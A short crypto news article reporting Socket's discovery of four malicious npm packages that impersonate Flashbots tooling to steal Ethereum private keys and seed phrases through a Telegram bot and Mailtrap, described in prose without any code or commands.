- Researchers have found four harmful npm packages targeting Ethereum wallet credentials.
- The packages pretend to be official Flashbots tools but steal private keys and mnemonic phrases.
- The attackers use Telegram bots and Mailtrap for sending stolen data.
- Some of the packages redirect transactions to attacker-controlled wallets.
- Vietnamese language comments suggest a Vietnamese-speaking attacker.
Security researchers discovered four malicious software packages on the npm registry that target cryptocurrency developers by stealing sensitive wallet information. The packages, uploaded by a user called flashbotts, were posted between September 2023 and August 19, 2025, and are still available for download.
According to Socket researcher Kush Pandya, the harmful packages pretend to be legitimate cryptographic utilities and claim to offer compatibility with Flashbots MEV infrastructure. In reality, these packages extract private keys and mnemonic seed phrases—critical information for accessing cryptocurrency wallets—and send them to an attacker-controlled Telegram bot. One of the packages, @flashbotts/ethers-provider-bundle, also transmits environment variables over SMTP using Mailtrap, which allows communication with external email services.
The most dangerous package, @flashbotts/ethers-provider-bundle, hides its harmful actions under the appearance of offering full API support for Flashbots. It includes a function that forwards all unsigned Ethereum transactions to the attacker’s address and logs information from already signed transactions. Another package, sdk-ethers, can send wallet seed phrases to the Telegram bot, though these functions only activate when called by developers in their code. The package flashbot-sdk-eth also tries to steal private keys, and gram-utilz provides a way to send any data to the attacker’s Telegram chat.
Mnemonic phrases serve as the master password to restore and access cryptocurrency wallets. If attackers steal these phrases, they can take full control of victims’ funds. Socket’s analysis found comments in Vietnamese throughout the code, suggesting the attacker may be Vietnamese-speaking.
Socket stated, “Because Flashbots is widely trusted by validators, searchers, and DeFi developers, any package that appears to be an official SDK has a high chance of being adopted by operators running trading bots or managing hot wallets. A compromised private key in this environment can lead to immediate, irreversible theft of funds.”
Researchers say these attacks take advantage of trust in familiar package names and legitimate-looking utilities to slip harmful code past users. The findings highlight a growing threat of software supply chain attacks that exploit trust within the cryptocurrency development community.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- BRICS Officially Cites XRP Ledger for Cross-Border Payment Reform
- CopyPasta exploit targets Cursor, risks Coinbase codebases!!
- StablecoinX-TLGY Secure $530M PIPE, $890M Commitments Ahead.
- SOL Strategies Wins Nasdaq Nod, First Solana Treasury to List
- SOL Strategies (HODL) to List on Nasdaq Global Select Market
